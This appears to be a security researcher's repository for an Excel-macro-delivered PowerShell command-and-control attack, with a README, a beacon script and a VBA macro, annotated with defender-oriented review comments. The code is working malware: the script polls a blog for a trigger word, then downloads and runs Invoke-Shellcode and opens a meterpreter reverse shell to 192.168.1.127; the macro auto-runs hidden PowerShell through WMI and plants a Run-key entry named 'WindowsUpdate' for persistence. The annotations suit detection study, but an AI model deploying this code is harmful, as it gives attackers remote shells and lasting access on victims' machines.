├── README.md
├── C2Code.ps1
└── Macro

/README.md:
--------------------------------------------------------------------------------
Powershell-C2
=============

This attack stems off of my Powershell Payload Excel Delivery, but it uses a really cool method for Command and Control/persistence on the box.

A walk-through can be found here: http://enigma0x3.wordpress.com/2014/01/17/command-and-control-using-powershell-and-your-favorite-website/


Credit to @obscuresec and @mattifestation for this method. Their talk about it can be found here:
http://www.youtube.com/watch?v=j-r6UonEkUw

--------------------------------------------------------------------------------
/C2Code.ps1:
--------------------------------------------------------------------------------
#Credit to @obscuresec and @mattifestation for this
# Review notes (defender view): this script is a polling "dead-drop" beacon. It repeatedly
# fetches a public blog page and treats the presence of a trigger word in that page as the
# signal to download and run a second stage. Nothing below the loop's If runs until the
# word appears on the page.

# Trigger token the operator posts on the page. String.Contains is an ordinal,
# case-sensitive match, so only this exact spelling/casing fires the beacon.
$Word = 'h4x0r'
$WebClientObject = New-Object Net.WebClient
# Tasking channel: an ordinary HTTP blog post. The egress looks like a browser reading a
# blog, so URL/reputation filtering alone will not flag it; the tell is the fixed 30-second
# cadence from powershell.exe (see the loop below).
$comment = "http://enigma0x3.wordpress.com/2014/01/15/new-feature-added-to-powershell-payload-excel-delivery/"
# Browser-like User-Agent so the poll blends with normal traffic. Note the stray trailing ")"
# in the string - it is sent as-is, which makes this exact UA value a usable network IoC for
# this sample.
$WebClientObject.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36)")
While($True){
    # Poll: download the whole page and look for the trigger word anywhere in it.
    $CommentResult = $WebClientObject.DownloadString($comment)
    $Found = $CommentResult.contains($Word)
    If($Found) {
        # Stage 2: download-and-IEX of Invoke-Shellcode (PowerSploit's in-memory shellcode
        # runner) over plain HTTP from a hard-coded lab address (192.168.1.127), then a
        # meterpreter reverse_https back to 192.168.1.127:1111. Nothing is written to disk,
        # so PowerShell Script Block Logging (Event ID 4104), AMSI and egress monitoring
        # for powershell.exe are the relevant controls here.
        IEX $WebClientObject.DownloadString('http://192.168.1.127/Invoke-Shellcode')
        Invoke-Shellcode -Payload windows/meterpreter/reverse_https -LHOST 192.168.1.127 -LPORT 1111 -Force
        # One-shot: the beacon exits after the first successful trigger.
        Return
    }
    # Fixed 30 s sleep => regular periodic GETs to the same URL with the same UA, i.e. a
    # classic beaconing pattern in proxy/NetFlow data.
    Start-Sleep -Seconds 30
}

--------------------------------------------------------------------------------
/Macro:
--------------------------------------------------------------------------------
' Author: Matt Nelson
' Twitter: @enigma0x3
' Review notes (defender view): Excel auto-run macro. Auto_Open fires when the workbook is
' opened with macros enabled; it launches the stage-1 PowerShell through WMI (Execute) and
' then plants an HKCU Run-key entry (Persist). Neither step needs administrative rights.

Sub Auto_Open()
    Execute
    Persist

End Sub


' Spawns a hidden powershell.exe through WMI instead of Shell()/CreateProcess.
' Because Win32_Process.Create is serviced by the WMI provider host, the new process's
' parent is WmiPrvSE.exe rather than EXCEL.EXE - a parent/child rule written as
' "Office -> powershell.exe" will miss it. Hunt instead on WmiPrvSE.exe -> powershell.exe
' with -ExecutionPolicy Bypass / -WindowStyle Hidden / -noprofile on the command line, and
' on Win32_Process.Create calls whose caller is an Office process.
Public Function Execute() As Variant
    Const HIDDEN_WINDOW = 0
    strComputer = "."   ' local machine; no Option Explicit in this module, so these are implicit Variants
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

    ' Win32_ProcessStartup with ShowWindow = 0 keeps the console window invisible to the user.
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    ' Command line: download-and-IEX Invoke-Shellcode over plain HTTP from 192.168.1.127 and
    ' start a meterpreter reverse_https to 192.168.1.127:1111. -noexit keeps the hidden host
    ' process alive afterwards. intProcessID receives the new PID; the Create return code is
    ' not checked, so a failed launch is silent.
    objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
End Function


' Persistence: writes an HKCU\...\Run value so a hidden powershell.exe re-fetches and IEXes
' http://192.168.1.127/persist.ps1 at every logon of this user. HKCU is writable without
' elevation, and the value name "WindowsUpdate" is presumably chosen to look benign in a
' casual review of the key.
' Detection: registry value-set telemetry on the Run key (e.g. Sysmon Event ID 13), periodic
' Autoruns review, and any Run entry whose data contains "powershell", "IEX" and
' "DownloadString".
Public Function Persist() As Variant
    Dim WShell As Object
    Set WShell = CreateObject("WScript.Shell")
    WShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate", "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -NonInteractive -WindowStyle Hidden -noprofile -noexit -Command IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/persist.ps1'))", "REG_SZ"
    Set WShell = Nothing
End Function

--------------------------------------------------------------------------------